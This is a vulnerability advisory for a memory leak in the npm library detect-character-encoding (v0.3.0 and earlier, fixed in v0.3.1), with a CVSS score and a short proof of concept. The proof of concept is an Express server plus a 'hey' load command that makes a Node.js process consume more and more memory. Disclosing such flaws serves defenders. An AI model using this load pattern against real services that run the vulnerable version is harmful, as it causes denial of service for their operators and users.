Lucene search

K
osvGoogleOSV:GHSA-5RWJ-J5M3-3CHJ
HistorySep 01, 2021 - 6:25 p.m.

Missing Release of Memory after Effective Lifetime in detect-character-encoding

2021-09-0118:25:16
Google
osv.dev
9

EPSS

0.003

Percentile

69.9%

Impact

In detect-character-encoding v0.3.0 and earlier, allocated memory is not released.

Patches

The problem has been patched in detect-character-encoding v0.3.1.

CVSS score

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/RL:O/RC:C

Base Score: 7.5 (High)
Temporal Score: 7.2 (High)

Since detect-character-encoding is a library, the scoring is based on the โ€œreasonable worst-case implementation scenarioโ€, namely, using detect-character-encoding in a program accessible over the internet which becomes unavailable when running out of memory. Depending on your specific implementation, the vulnerabilityโ€™s severity in your program may be different.

Proof of concept

const express = require("express");
const detectCharacterEncoding = require("detect-character-encoding");

const app = express();

app.get("/", (req, res) => {
  detectCharacterEncoding(Buffer.from("foo"));

  res.end();
});

app.listen(3000);

hey -n 1000000 http://localhost:3000 (hey) causes the Node.js process to consume more and more memory.

References

EPSS

0.003

Percentile

69.9%

Related for OSV:GHSA-5RWJ-J5M3-3CHJ